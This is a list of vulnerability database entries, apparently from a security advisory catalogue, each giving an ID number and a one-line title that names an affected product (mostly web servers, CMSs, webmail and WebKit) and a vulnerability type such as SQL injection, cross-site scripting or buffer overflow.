[60404] Novell GroupWise WebAccess component unspecified cross-site scripting
[60403] Novell GroupWise WebAccess component message cross-site scripting
[60402] Novell GroupWise WebAccess component unspecified information disclosure
[60362] Asterisk Recording Interface recording_popup.php cross-site scripting
[60361] Asterisk Recording Interface page.ampusers.php cross-site request forgery
[60360] Asterisk Recording Interface index.php path disclosure
[60359] Asterisk Recording Interface index.php denial of service
[60358] Asterisk Recording Interface index.php file include
[60333] Oracle Sun Products Sun Java System Web Proxy Server component unspecified
[60308] Oracle Fusion Middleware WebLogic Server component security bypass
[60273] Groupmax World Wide Web Desktop products unspecified cross-site scripting
[60262] Web_Links module for PHP-Nuke description SQL injection
[60252] Frog CMS administrative interface cross-site request forgery
[60251] Orbis CMS interface cross-site request forgery
[60124] Wiki Web Help revert.php cross-site scripting
[60123] Wiki Web Help uploadimage.php file upload
[60100] Wiki Web Help getpage.php SQL injection
[60077] WorksForWeb iLister listing script action parameter file include
[60070] BrotherScripts Recipe Website recipedetail.php SQL injection
[60044] Google Chrome WebGL code execution
[60023] SasCam Webcam Server ActiveX control buffer overflow
[60020] Sun Java System Web Server admin denial of service
[60018] IBM WebSphere MQ Subject DN spoofing
[60012] Cisco ASA WebVPN portal cross-site scripting
[59983] InterScan Web Security Virtual Appliance login_account_add_modify.jsp cross-site scripting
[59934] webERP UserSettings.php cross-site request forgery
[59931] WebsiteBaker add.php file include
[59930] WebsiteBaker settings2.php file include
[59929] WebsiteBaker details.php code parameter file include
[59926] WebsiteBaker details.php file include
[59924] WebsiteBaker Template details.php directory traversal
[59922] WebsiteBaker details.php directory traversal
[59921] WebsiteBaker sections.php SQL injection
[59919] WebsiteBaker settings2.php SQL injection
[59917] WebsiteBaker add.php SQL injection
[59916] WebsiteBaker details.php SQL injection
[59915] WebsiteBaker save_field.php cross-site scripting
[59914] WebsiteBaker details.php cross-site scripting
[59911] WebsiteBaker index.php cross-site scripting
[59903] WebDM CMS cont_form.php SQL injection
[59880] EJBCA Admin interface cross-site scripting
[59850] Cisco ASA interface response splitting
[59823] Lois Software WebDB index.php SQL injection
[59767] WebKit IFRAME information disclosure
[59728] 2daybiz Web Template Software costumize.php SQL injection
[59727] 2daybiz Web Template Software memberlogin.php cross-site scripting
[59726] 2daybiz Web Template Software category.php cross-site scripting
[59714] Weborf unicode header denial of service
[59703] Trend Micro InterScan Web Security Virtual Appliance uihelper command execution
[59692] Trend Micro InterScan Web Security Virtual Appliance filename file upload
[59691] Trend Micro InterScan Web Security Virtual Appliance pkg_name file download
[59690] Trend Micro InterScan Web Security Virtual Appliance exportname directory traversal
[59647] WebSphere Application Server Administration Console cross-site scripting
[59646] WebSphere Application Server Administration Console cross-site scripting
[59642] Getaphpsite Webring service category.php SQL injection
[59636] Apple iOS WebKit spoofing
[59625] HP OpenView Network Node Manager ovwebsnmpsrv.exe buffer overflow
[59620] Bizweb component for Joomla! index.php cross-site scripting
[59609] IBM WebSphere ILOG JRules multiple cross-site scripting
[59575] WebsiteBaker CMS add.php cross-site request forgery
[59573] Spring Framework WebappClassLoader code execution
[59562] H264WebCam GET denial of service
[59545] Moodle weblib.php cross-site scripting
[59508] Apple iTunes WebKit unspecified variant 3
[59507] Apple iTunes WebKit unspecified variant 2
[59506] Apple iTunes WebKit unspecified variant 1
[59502] SAP J2EE Engine Core telnet interface weak security
[59487] IISWorks ASPWebMail Webmail.mdb information disclosure
[59478] Webvolume Restaurant Listing TypeSearch.asp SQL injection
[59476] Webvolume Business Classified Listing Typesearch.asp SQL injection
[59470] eWebquiz Quiztype SQL injection
[59467] Apple Mac OS X Ruby WEBrick cross-site scripting
[59440] Joke Website Script search.php cross-site scripting
[59439] Joke Website Script search.php SQL Injection
[59396] VU Web Visitor Analyst login page SQL injection
[59385] LiteSpeed Web Server information disclosure
[59362] Webmedia Explorer folder.class.php cross-site request forgery
[59361] Webmedia Explorer folder.class.php cross-site scripting
[59349] Miniweb index.php module parameter file include
[59348] Miniweb index.php module parameter SQL Injection
[59342] Snom VoIP Phone Firmware interface security bypass
[59341] IgnitionSuite Web CMS WebDmailUnsubscribe.aspx security bypass
[59293] CA PSFormX and WebScan ActiveX controls code execution
[59291] Web Wiz Forums new_reply_form.asp SQL Injection
[59279] Juniper IVE OS interface cross-site scripting
[59249] HP OpenView Network Node Manager ovwebsnmpsrv.exe buffer overflow
[59236] Pre Web Host celeron.php SQL injection
[59219] Apple Safari WebKit CSS :visited pseudo-class information disclosure
[59218] Apple Safari WebKit HTML tables code execution
[59214] Apple Safari WebKit fonts code execution
[59205] Apple Safari WebKit text node code execution
[59204] Apple Safari WebKit HTTP redirect information disclosure
[59203] Apple Safari WebKit textarea element cross-site scripting
[59202] Apple Safari WebKit HTML document subtree code execution
[59201] Apple Safari WebKit Node.normalize method code execution
[59200] Apple Safari WebKit DOM Range objects code execution
[59199] Apple Safari WebKit malformed URLs cross-site scripting
[59198] Apple Safari WebKit execCommand security bypass
[59197] Apple Safari WebKit drag and drop code execution
[59196] Apple Safari WebKit src attribute cross-site scripting
[59195] Apple Safari WebKit :after pseudo-selector code execution
[59194] Apple Safari WebKit SVG image pattern information disclosure
[59193] Apple Safari WebKit libxml contexts code execution
[59192] Apple Safari WebKit removeChild DOM method code execution
[59191] Apple Safari WebKit NTLM weak security
[59190] Apple Safari WebKit hover event code execution
[59189] Apple Safari WebKit IRC port blacklist weak security
[59188] Apple Safari WebKit non-default TCP port weak security
[59187] Apple Safari WebKit Referer header information disclosure
[59186] Apple Safari WebKit vertical positioning code execution
[59185] Apple Safari WebKit CSS run-ins code execution
[59184] Apple Safari WebKit nested SVG use element code execution
[59183] Apple Safari WebKit multiple SVG use elements code execution
[59182] Apple Safari WebKit SVG use element code execution
[59181] Apple Safari WebKit SVG document event listener code execution
[59180] Apple Safari WebKit :first-letter pseudo-element code execution
[59179] Apple Safari WebKit caption element code execution
[59178] Apple Safari WebKit form input element code execution
[59177] Apple Safari WebKit ordered list insertions code execution
[59176] Apple Safari WebKit layout changes code execution
[59175] Apple Safari WebKit container elements code execution
[59174] Apple Safari WebKit DOM constructor object cross-site scripting
[59173] Apple Safari WebKit keyboard focus weak security
[59172] Apple Safari WebKit HTML document fragment cross-site scripting
[59171] Apple Safari WebKit CSS information disclosure
[59170] Apple Safari WebKit HTML buttons code execution
[59169] Apple Safari WebKit local storage and web SQL database information disclosure
[59168] Apple Safari WebKit UTF-7 encoding cross-site scripting
[59167] Apple Safari WebKit dragging or pasting selection cross-site scripting
[59166] Apple Safari WebKit links and images information disclosure
[59149] WebBiblio Subject Gateway System help.php file include
[59135] Weborf Range header denial of service
[59120] QtWeb marquee tag denial of service
[59118] Seti@home Web Monitor seti.php file include
[59085] Websense via security bypass
[59054] Accoria Rock Web Server authcfg.cgi format string
[59052] Accoria Rock Web Server loadstatic.cgi directory traversal
[59050] Accoria Rock Web Server multiple scripts cross-site scripting
[59026] osCommerce Visitor Web Stats module SQL Injection
[59019] GoAhead WebServer HTTP source disclosure
[58989] Marketing Web Design verfoto.php cross-site scripting
[58987] Marketing Web Design verfoto.php SQL injection
[58986] Aim Web Design newsarticle.php SQL injection
[58985] Aim Web Design id cross-site scripting
[58984] Webiz videos.php file upload
[58983] Webiz index.php SQL Injection
[58981] 360 Web Manager CMS IDM parameter cross-site scripting
[58980] Realtor Web Site System E-Commerce idfestival SQL injection
[58956] Cisco DPC2100R2 interface default password
[58935] Home FTP Server interface cross-site request forgery
[58933] 360 Web Manager CMS IDSM parameter SQL injection
[58928] Easy Address Book WebServer users_admin.php cross-site request forgery
[58892] Webby HTTP GET buffer overflow
[58877] NITRO Web Gallery index.php SQL injection
[58873] Web 5000 page_show.php SQL Injection
[58872] Webit CMS main.php SQL Injection
[58836] Interuse Website Builder index2php SQL Injection
[58835] Microsoft Outlook Web Access (OWA) id cross-site scripting
[58828] Prowebassociates CMS template_event SQL Injection
[58813] Webperformance Ecommerce shop.php SQL Injection
[58810] eWebeditor upload.asp file upload
[58780] Kingsoft WebShield KAVSafe.sys privilege escalation
[58748] webYourPhotos index.php file include
[58716] McAfee Email Gateway systemWebAdminConfig.do security bypass
[58689] Hitachi Web Server SSL CRL security bypass
[58688] Hitachi Web Server SSL denial of service
[58683] QtWeb document.write() denial of service
[58677] WebJaxe administration.php SQL injection
[58672] Webloader izle.php SQL injection
[58642] Abyss Web Server password cross-site request forgery
[58636] WebSAM DeploymentManager packets denial of service
[58608] Consona CRM Suite SdcWebSecureBase code execution
[58607] Consona CRM Suite SdcWebSecureBase security bypass
[58606] Consona CRM Suite SdcWebSecureBase security bypass
[58600] Web Design Solution index.php SQL injection
[58562] Zervit Webserver index.html directory traversal
[58561] Zervit Webserver index.html source code disclosure
[58560] MiniWebsvr HTTP directory traversal
[58557] WebSphere Application Server Web Container information disclosure
[58556] WebSphere Application Server Web Container denial of service
[58555] WebSphere Application Server Deployment Manager and nodeagent denial of service
[58554] WebSphere Application Server WebServices PKIPath and PKCS#7 token type security bypass
[58522] Movable Type administrative user interface cross-site scripting
[58520] e-webtech fixed_page.php SQL Injection
[58465] e-webtech new.asp SQL injection
[58400] Apple Safari WebKit.dll denial of service
[58373] Webprodz editar.php SQL injection
[58366] Consona CRM Suite Web server cross-site scripting
[58354] Slooze PHP Web Photo Album slooze.php command execution
[58324] IBM WebSphere Application Server trace log information disclosure
[58323] IBM WebSphere Application Server debugging mode information disclosure
[58219] Webmoney Advisor ActiveX control denial of service
[58214] gpEasy CMS admin interface cross-site request forgery
[58207] webMathematica MSP script information disclosure
[58196] Apple Safari WebKit blink tag denial of service
[58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
[58148] Red Hat JBoss Enterprise Application Platform Web Console information disclosure
[58141] Wing FTP Server Web Client directory traversal
[58119] Webessence comment_do.php SQL injection
[58118] Webessence media_new_do.php file upload
[58117] Webessence oembed.php cross-site scripting
[58101] Palm Pre WebOS SMS client cross-site scripting
[58100] Memorial Web Site Script admin security bypass
[58099] Memorial Web Site Script index.php security bypass
[58098] Memorial Web Site Script show_memorial.php SQL injection
[58082] NKInFoWeb loadorder.php SQL injection
[58039] IBM WebSphere MQ channel control data denial of service
[58032] Webmoney WMI component for Joomla! index.php file include
[57963] WebAsyst Shop-Script multiple cross-site scripting
[57962] WebAsyst Shop-Script multiple parameters SQL injection
[57961] WebAsyst Shop-Script sub directory traversal
[57950] N/X Web CMS nxheader.inc.php file include
[57949] N/X Web CMS path file include
[57913] WebAdmin index.php file upload
[57905] Iomega Home Media Network Hard Drive smbwebclient.php authentication bypass
[57902] Imperva SecureSphere Web Application Firewall and Database Firewall requests security bypass
[57812] Cisco Secure Desktop CSDWebInstaller ActiveX control code execution
[57806] Java Web Start ActiveX control instantiation
[57805] Multi Profit Websites page.php file include
[57802] Webessence configure.php cross-site request forgery
[57801] Webessence media.php cross-site scripting
[57726] Oracle Collaboration Suite User Interface Components unspecified
[57685] com_webtv component for Joomla! controller parameter file include
[57648] com_webeecomment component for Joomla! controller parameter file include
[57623] Miniature Java Web Server path disclosure
[57622] Miniature Java Web Server phishing
[57621] Miniature Java Web Server unspecified directory traversal
[57613] IBM WebSphere Portal login unspecified
[57587] Sun Java System Web Server WebDAV LOCK command information disclosure
[57547] uTorrent Web UI denial of service
[57524] Java Mini Web Server directory traversal
[57523] Java Mini Web Server cross-site scripting
[57482] webERPcustomer component for Joomla! file include
[57468] WebKit JavaScript phishing
[57441] Weblinks component for Joomla! index.php SQL injection
[57411] Faweb2 admin.php security bypass
[57398] Apache ActiveMQ Web console cross-site request forgery
[57368] Oracle Java SE and Java for Business Java Web Start and Java Plug-in unspecified variant 3
[57361] Oracle Java SE and Java for Business Java Web Start and Java Plug-in unspecified variant 2
[57353] Oracle Java SE and Java for Business Java Web Start and Java Plug-in unspecified
[57312] Multiple VMware products Web requests spoofing
[57311] Multiple VMware products Web Access cross-site scripting
[57241] Open Web Analytics mw_plugin.php file include
[57240] Open Web Analytics index.php file include
[57236] OmniWeb TCP security bypass
[57232] Uebimiau Webmail multiple directories information disclosure
[57231] Uebimiau Webmail multiple scripts path disclosure
[57230] Uebimiau Webmail lid cross-site scripting
[57201] WeBAM CaptchaSecurityImages.php denial of service
[57200] WeBAM CaptchaSecurityImages.php security bypass
[57185] Websphere Application Server wsadmin scripting information disclosure
[57182] WebSphere Application Server ORB client denial of service
[57171] Website Baker backup-sql.php information disclosure
[57164] WebSphere Application Server Administration Console cross-site scripting
[57139] Cisco IOS interface queue denial of service
[57095] Webmatic search cross-site scripting
[57094] Webmatic multiple parameters cross-site scripting
[57060] WebMaid CMS cContactus.php file include
[57059] WebMaid CMS index.php file include
[57042] Google Chrome WebKit JavaScript objects integer overflow
[57017] IBM DB2 Content Manager DB2 Content Manager Web services unspecified
[56955] Web Wiz Forums multiple cross-site request forgery
[56954] Embedthis Appweb waitCallback() denial of service
[56851] Eros Webkatalog start.php SQL injection
[56780] Uebimiau Webmail email information disclosure
[56764] Perforce P4Web session hijacking
[56697] CSS Web Installer and Command On Demand ActiveX control buffer overflow
[56668] CUPS file descriptors-handling interface denial of service
[56650] WebTrends domain name cross-site scripting
[56647] WebLogExpert domain name cross-site scripting
[56646] WebExpert User-Agent HTTP header cross-site scripting
[56633] Sun ONE (aka iPlanet) Web Server log-preview security bypass
[56632] Sun ONE (aka iPlanet) Web Server iPlanet Log Analyzer cross-site scripting
[56544] Website Baker print_error() security bypass
[56531] WebAdministrator Lite download.php SQL injection
[56527] WebKit CSSSelector() denial of service
[56473] IBM WebSphere Portal Portlet Palette cross-site scripting
[56388] LiteSpeed Web Server confMgr.php cross-site request forgery
[56368] Trendnet TV-IP201 GoAhead WebServer directory traversal
[56360] Mozilla Firefox and SeaMonkey Web Workers code execution
[56348] Intuitive-websites form.php SQL injection
[56339] Cisco ASA 5500 WebVPN DTLS denial of service
[56295] Dillo Web browser cookie URL information disclosure
[56290] Webee Comments component for Joomla! BBCode cross-site scripting
[56289] Webee Comments component for Joomla! index.php SQL injection
[56254] WebHtmlEditor component for NetAdvantage InitialDirectory directory traversal
[56246] Accellion File Transfer Appliance (FTA) web_client_user_guide.html
[56245] SAP NetWeaver WebDynpro runtime cross-site scripting
[56227] RSA SecurID IISWebAgentIF.dll cross-site scripting
[56188] Cisco IronPort Encryption Appliance WebSafe information disclosure
[56185] WebSphere Application Server Requires SSL option weak security
[56169] Gefest Web Home Server HTTP directory traversal
[56168] JDownloader JDExternInterface.java command execution
[56090] IBM WebSphere Commerce encryption scheme weak security
[56089] IBM WebSphere Commerce encryption key weak security
[56084] WebCalendar unspecified cross-site request forgery
[56083] WebCalendar users.php cross-site scripting
[56059] Sun ONE Messaging Server and iPlanet Messaging Server Webmail cross-site scripting
[56057] Sun ONE Messaging Server and iPlanet Messaging Server Webmail unauthorized access
[56021] eWebeditor login.asp security bypass
[56020] eWebeditor ewebeditor.mdb information disclosure
[56019] eWebeditor upload.asp file upload
[56014] crownweb page.cfm SQL injection
[55998] TantumWeb PhpCatalog unspecified cross-site request forgery
[55964] Sun Java System Web Server method token denial of service
[55959] Redatam+SP WebServer RpWebEngine.exe/PortalAction path disclosure
[55958] Redatam+SP WebServer RpWebEngine.exe/PortalAction cross-site scripting
[55880] Google Chrome Webkit pop-up security bypass
[55858] Zeus Web Server DNS spoofing
[55845] Oracle WebLogic Server Node manager command execution
[55828] Xerox WorkCentre Network Controller and Web Server unauthorized access
[55821] VP-ASP Shopping Cart websess SQL injection
[55815] eWebeditor upload.asp directory traversal
[55812] Sun Java System Web Server WebDAV format string
[55792] Sun Java System Web Server Authorization: Digest header buffer overflow
[55781] SAP Web Application Server ITS buffer overflow
[55764] Sun Java System Web Server WebDAV buffer overflow
[55761] EasySiteNetwork Jokes Complete Website multiple cross-site scripting
[55744] WebSphere Service Registry and Repository (WSRR) configuration property security bypass
[55733] Zeus Web Server unspecified cross-site scripting
[55728] Zeus Web Server SSLv2 packets buffer overflow
[55727] Web Server Creator index.php file include
[55726] Web Server Creator index.php cross-site scripting
[55725] Web Server Creator customize.php directory traversal
[55719] Sun Java System Web Server TRACE buffer overflow
[55682] WebCalenderC3 unspecified cross-site scripting
[55681] WebCalenderC3 unspecified file include
[55677] TrendMicro Web-Deployment ActiveX Control code execution
[55663] IBM Lotus Web Content Management login page cross-site scripting
[55652] Jetty WebApp JSP Snoop page cross-site scripting
[55628] HP Web Jetadmin SQL server unauthorized access
[55582] Oracle BEA WebLogic Server data manipulation
[55581] Oracle BEA WebLogic Server unspecified denial of service
[55579] Oracle BEA WebLogic Server unspecified denial of service
[55578] Oracle BEA WebLogic Server information disclosure
[55548] IBM Lotus Domino Web Access unspecified
[55533] Ruby WEBrick command execution
[55528] Sun Java System Web Server memory address code execution
[55527] Sun Java System Web Server data information disclosure
[55473] IBM Lotus Domino Web Access Try Lotus iNotes anyway unspecified
[55471] IBM Lotus Domino Web Access script command unspecified
[55470] IBM Lotus Domino Web Access ultra-light unspecified
[55440] RoundCube Webmail identities.inc path disclosure
[55437] RoundCube Webmail error.inc cross-site scripting
[55420] Intellicom NetBiter WebSCADA firmware default password
[55408] SQL-Ledger admin interface security bypass
[55405] LineWeb edit_news.php SQL injection
[55402] LineWeb index.php and admin/index.php file include
[55358] CARTwebERP component for Joomla! controller file include
[55351] F5 Data Manager interface directory traversal
[55347] MasterWeb Script newsID SQL injection
[55280] list Web addlink.php SQL injection
[55248] Freewebscriptz Games user and pass SQL injection
[55213] Aptgp webm_email parameter cross-site scripting
[55191] FreeWebshop.org initlang.inc.php directory traversal
[55190] FreeWebshop.org sub.inc.php SQL injection
[55189] FreeWebshop.org multiple weak security
[55174] OpenX administrative interface security bypass
[55148] VSFTPD-WEBMIN-MODULE unknown unspecified
[55145] WebcamXP component for Joomla! Itemid cross-site scripting
[55124] webring index.php cross-site scripting
[55094] Proverbs Web Calendar calendar.php cross-site scripting
[55093] Proverbs Web Calendar calendar.php SQL injection
[55072] Jevonweb Guestbook setup.php security bypass
[55045] Web Wiz Forums wwForum.mdb information disclosure
[55043] Web Wiz NewsPad NewsPad.mdb information disclosure
[55027] IBM DB2 Client Interfaces unspecified
[55008] webMathematica MSP cross-site scripting
[54995] Cisco WebEx WRF Player atrpui.dll buffer overflow
[54994] Cisco WebEx WRF Player atas32.dll buffer overflow
[54993] Cisco WebEx WRF Player atas32.dll buffer overflow
[54992] Cisco WebEx WRF Player ataudio.dll buffer overflow
[54991] Cisco WebEx WRF Player atas32.dll buffer overflow
[54969] Web Application Firewall index.cgi cross-site scripting
[54957] Social Web CMS multiple cross-site request forgery
[54956] Social Web CMS index.php cross-site scripting
[54955] Social Web CMS module.php information disclosure
[54892] eWebquiz QuizID SQL injection
[54886] Cisco Adaptive Security Appliances (ASA) WebVPN security bypass
[54885] IBM Rational ClearQuest CQWeb information disclosure
[54880] Jobscript4Web multiple cross-site request forgery
[54841] Cisco WebEx WRF Player buffer overflow
[54820] Multiple VMWare products WebWorks cross-site scripting
[54817] Multiple Horde products administration interface cross-site scripting
[54754] Webmatic unspecified SQL injection
[54753] Webmatic unspecified cross-site scripting
[54692] Kiwi Syslog Server Web Access information disclosure
[54668] Webmin and Usermin unspecified cross-site scripting
[54665] Multiple Symantec products VRTSweb code execution
[54661] HP OpenView Network Node Manager webappmon.exe CGI buffer overflow
[54659] HP OpenView Network Node Manager OvWebHelp.exe buffer overflow
[54655] HP OpenView Network Node Manager ovwebsnmpsrv.exe buffer overflow
[54602] HP Operations Manager ovwebusr default password
[54592] IBM WebSphere Portal XMLAccess component unspecified
[54542] DAQFactory Web service buffer overflow
[54539] Ipswitch WhatsUp NMWebService.exe denial of service
[54537] LiteSpeed Web Server post-authentication code execution
[54536] LiteSpeed Web Server Lshttpd denial of service
[54531] IBM WebSphere Portal People Picker Tag cross-site scripting
[54494] IBM WebSphere Application Server V7 Feature Pack for Communications Enabled Applications (CEA) collaboration session spoofing
[54395] KR - PHP Web Content Server krgourl.php file include
[54297] Google Chrome WebKit denial of service
[54296] Google Chrome WebFrameLoaderClient::dispatchDidChangeLocationWithinPage denial of service
[54289] ToutVirtual VirtualIQ JMX Console and Web Console command execution
[54279] Baby Web Server requests denial of service
[54253] HP ProCurve Switch interface cross-site scripting
[54249] Web Services module for Drupal unspecified security bypass
[54229] IBM WebSphere Application Server Administration Console cross-site scripting
[54228] IBM WebSphere Application Server UserRegistry information disclosure
[54227] IBM WebSphere Application Server Administration Console cross-site request forgery
[54139] RoundCube Webmail modify cross-site request forgery
[54138] RoundCube Webmail email cross-site request forgery
[54137] Xerox Fiery Webtools summary.php SQL injection
[54125] Sun Java Web Start Installer code execution
[54065] Sun Java System Web Server unspecified buffer overflow
[54024] Cherokee Web Server HTTP directory traversal
[54022] Opera Web fonts spoofing
[53987] Mozilla Firefox JavaScript web-workers code execution
[53957] Cherokee Web Server GET request denial of service
[53885] South River Technologies WebDrive WebDrive Service privilege escalation
[53872] Oracle BEA Product Suite WebLogic Portal component unspecified
[53871] Oracle BEA Product Suite WebLogic Portal component unspecified
[53870] Oracle BEA Product Suite WebLogic Portal component unspecified
[53834] Websense Email Security and Personal Email Manager email subject cross-site scripting
[53833] Websense Email Security and Personal Email Manager multiple cross-site scripting
[53832] Websense Email Security and Personal Email Manager STEMWADM.EXE denial of service
[53812] IBM Rational RequisitePro ReqWebHelp cross-site scripting
[53809] DWebPro file command execution
[53799] NaviCOPA Web Server source information disclosure
[53797] Webform module for Drupal cache information disclosure
[53796] Webform module for Drupal field labels cross-site scripting
[53672] AfterLogic WebMail Pro history_storage.aspx cross-site scripting
[53667] Palm Pre WebOS unspecified
[53651] Palm Pre WebOS email code execution
[53612] McAfee Email and Web Security Appliance unspecified information disclosure
[53603] Open WebMail unspecified cross-site scripting
[53599] BIGACE Web CMS unspecified cross-site request forgery
[53586] Java Web Start command launcher Mac OS X buffer overflow
[53501] Juniper JUNOS JWeb cross-site scripting
[53494] iCRM Basic component for Joomla! admin interface security bypass
[53492] SAP GUI EAI WebViewer3D file overwrite
[53491] SAP GUI EAI WebViewer2D file overwrite
[53482] Cisco ACE XML Gateway and Cisco ACE Web Application Firewall IP address information disclosure
[53435] MaxWebPortal forum.asp SQL injection
[53431] nginx WebDAV component directory traversal
[53350] RADactive I-Load Webcontrol file upload
[53349] RADactive I-Load WebCoreModule.ashx directory traversal
[53348] RADactive I-Load WebcodeModule.ashx cross-site scripting
[53347] RADactive I-Load WebCoreModule.ashx path disclosure
[53344] IBM WebSphere Application Server unspecified denial of service
[53343] IBM WebSphere Application Server wsadmin JAAS-J2C information disclosure
[53342] IBM WebSphere Application Server Eclipse Help cross-site scripting
[53322] Novell GroupWise WebAccess User.Theme.index cross-site scripting
[53285] IBM WebSphere MQ readahead denial of service
[53280] Multi Website Browse SQL injection
[53278] NaviCOPA Web Server source information disclosure
[53257] BRS WebWeaver scripts security bypass
[53256] HotWeb Rentals details.asp SQL injection
[53246] WebAuth weblogin/login.fcgi information disclosure
[53244] Bugzilla Bug.create WebService SQL injection
[53243] Bugzilla Bug.search WebService SQL injection
[53229] Webservice-DIC yoyaku_41 unspecified command execution
[53191] IBM WebSphere MQ rriDecompress function denial of service
[53190] IBM WebSphere MQ server channel pool process denial of service
[53189] IBM WebSphere Business Events wberuntimeear application code execution
[53086] IBM Lotus Domino Web Access unspecified cross-site scripting
[53084] IBM WebSphere Commerce multiple unspecified
[53051] IBM WebSphere Application Server doGet and doTrace methods security bypass
[53028] Sun Java SE Java Web Start denial of service
[52993] QtWeb javascript cross-site scripting
[52916] BIGACE Web CMS index.php cross-site scripting
[52886] Sun ONE Web Server Search Cross-Site Scripting
[52724] Uebimiau Webmail system_admin/admin.ucf information disclosure
[52711] FreeNAS WebGUI cross-site request forgery
[52704] Non-SOAP Web Service Access
[52675] Buildbot Web status cross-site scripting
[52660] iScouter PHP Web Portal MySQL Password Retrieval
[52651] Webesse E-Card extension for TYPO3 unspecified information disclosure
[52645] Webesse Image Gallery extension for TYPO3 unspecified SQL injection
[52644] Webesse E-Card extension for TYPO3 unspecified directory traversal
[52618] IBM WebSphere Documentation Found
[52617] IBM WebSphere Debug Mode Enforcement
[52616] IBM WebSphere Configuration Information Disclosure
[52604] HTTP request forwarding (Web Proxy) detected
[52522] Sun OpenJDK IcedTea Java Web Start code execution
[52493] Hitachi Web Server (HWS) reverse proxy function denial of service
[52489] Multiple modules for Miniweb index.php SQL injection
[52488] Multiple modules for Miniweb index.php cross-site scripting
[52480] Web Server Access Control Files Improper Permissions Setting
[52479] Web Application Source Code Disclosure Pattern Found
[52478] Web.config File Configuration Settings Leakage
[52448] TurnkeyForms Web Hosting Directory login SQL injection
[52444] Active Web Mail TabOpenQuickTab1 SQL injection
[52413] Embedthis Appweb GET request buffer overflow
[52398] IBM Websphere Commerce trace information disclosure
[52393] IBM WebSphere Partner Gateway console SQL injection
[52390] Apple Safari WebKit pluginspage information disclosure
[52389] Apple Safari WebKit floating point numbers buffer overflow
[52375] IBM WebSphere Application Server ibm-portlet-ext.xmi security bypass
[52372] Huawei MT880 admin interface cross-site request forgery
[52340] Java Web Start ActiveX Control ATL code execution
[52292] Webform module for Drupal unspecified cross-site scripting variant 1
[52273] Windows Security Support Provider Interface credential forwarding
[52272] Oracle Web Listener Remote Command Execution
[52266] Oracle Application Server Administration Interface
[52255] Palm Pre webOS email notification and calendar cross-site scripting
[52227] Multi Website index.php SQL injection
[52225] TT Web Site Manager index.php SQL injection
[52224] Lotus Domino Web Server File Retrieval
[52215] simplePHPWeb files.php security bypass
[52188] WebStatCaffe visitorduration.php SQL injection
[52187] WebStatCaffe multiple scripts cross-site scripting
[52177] Epiri Professional Web Browser URI handler denial of service
[52162] Django Web server URL handler information disclosure
[52146] Web filter rule matched
[52145] Web User Authentication Success
[52144] Web Authentication Failed
[52105] Microsoft Office Web Components ActiveX control buffer overflow
[52083] IBM WebSphere Application Server z/OS information disclosure
[52082] IBM WebSphere Application Server wsadmin security bypass
[52081] IBM WebSphere Application Server migration information disclosure
[52079] IBM WebSphere Application Server single sign-on (SSO) with SPNEGO security bypass
[52078] IBM WebSphere Application Server Web services weak security
[52077] IBM WebSphere Application Server Administrative Configservice API information disclosure variant 1
[52076] IBM WebSphere Application Server CSIv2 security bypass
[52075] IBM WebSphere Application Server Administrative Configservice API information disclosure
[52074] IBM WebSphere Application Server Service Component Architecture (SCA) feature pack security bypass
[51977] Palm Pre WebOS LunaSysMgr code execution
[51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
[51913] Hutscripts PHP Website Script cid SQL injection
[51912] Hutscripts PHP Website Script msg cross-site scripting
[51878] EzWebCalendar images file upload
[51855] WebDAV MKCOL Method Site Defacement
[51854] EZWebSearch results.php cross-site scripting
[51815] WebVision news.php SQL injection
[51778] WebLeague install.php security bypass
[51777] WebLeague profile.php and index.php SQL injection
[51759] Oracle BEA Product Suite WebLogic Server component WLS console package unspecified
[51758] Oracle BEA Product Suite WebLogic Server component servlet container package unspecified
[51731] Cisco Unified Contact Center Express (Cisco Unified CCX) server administration interface directory traversal
[51730] Cisco Unified Contact Center Express (Cisco Unified CCX) server administrative interface cross-site scripting
[51700] Hitachi Web Server (HWS) SSL spoofing
[51699] Multiple Hitachi products Web server reverse proxy denial of service
[51672] AwingSoft Web3D Player ActiveX control buffer overflow
[51668] WebGUI unspecified cross-site request forgery
[51648] WebAsyst Shop-Script index.php cross-site scripting
[51647] WebAsyst Shop-Script index.php SQL injection
[51601] Palm webOS multiple unspecified
[51576] Citrix XenCenterWeb changepw.php cross-site request forgery
[51575] Citrix XenCenterWeb console.php cross-site scripting
[51574] Citrix XenCenterWeb login.php SQL injection
[51573] Citrix XenCenterWeb writeconfig.php code execution
[51547] Sun Java System Web Server Java Server information disclosure
[51530] IBM Tivoli Identity Manager self-service UI interface cross-site scripting
[51490] IBM WebSphere Application Server SOAP request security bypass
[51474] Netgear DG632 router webcm directory traversal
[51454] Microsoft Office Web Components ActiveX control buffer overflow
[51452] Microsoft Office Web Components ActiveX control HTML code execution
[51451] Microsoft Office Web Components ActiveX control code execution
[51421] Netgear DG632 router webcm authentication bypass
[51405] Sun Java Web Console unspecified cross-site scripting
[51356] IBM Rational ClearQuest CQWeb server cross-site scripting
[51338] Cisco Video Surveillance 2500 Series IP Camera embedded Web server information disclosure
[51337] Cisco Adaptive Security Appliance (ASA) Web VPN phishing
[51293] IBM WebSphere Application Server JAX-WS WS-Security policy security bypass
[51285] Website Publisher unspecified cross-site request forgery
[51279] phpDatingClub website.php cross-site scripting
[51268] Apple Safari Web Inspector cross-site scripting
[51250] WebNMS Framework report/ReportViewAction.do cross-site scripting
[51249] Apple Safari WebKit CRLF injection
[51228] Apple Safari WebKit clickjacking
[51218] Fretsweb player.php and song.php SQL injection
[51217] Fretsweb admin/common.php file include
[51173] IBM WebSphere Application Server HTTP methods Java Servlet Page (JSP) security bypass
[51170] IBM WebSphere Application Server secure login information disclosure
[51151] Webmedia Explorer index.php cross-site scripting
[51129] AdaptWeb a_index.php SQL injection
[51128] AdaptWeb index.php file include
[51115] Uebimiau Webmail admin/editor.php file overwrite
[51094] phpWebThings fdown.php SQL injection
[51052] phpWebThings help.php file include
[51042] IBM WebSphere MQ group names weak security
[51041] Google Chrome WebKit information disclosure
[51040] Google Chrome WebKit code execution
[51038] IBM WebSphere MQ client application Client Channel Definition Table (CCDT) buffer overflow
[50983] iPlanet Web Server HTTP TRACE cross-site scripting
[50965] IBM FileNet Content Manager Web Services Extensible Authentication Framework (WSEAF) security bypass
[50957] Web Directory PRO admins.php security bypass
[50956] Web Directory PRO backup_db.php information disclosure
[50953] Netgear RP614 administration interface cross-site request forgery
[50951] Sun Java System Web Server Reverse Proxy Plug-in cross-site scripting
[50949] Webform module for Drupal cross-site scripting
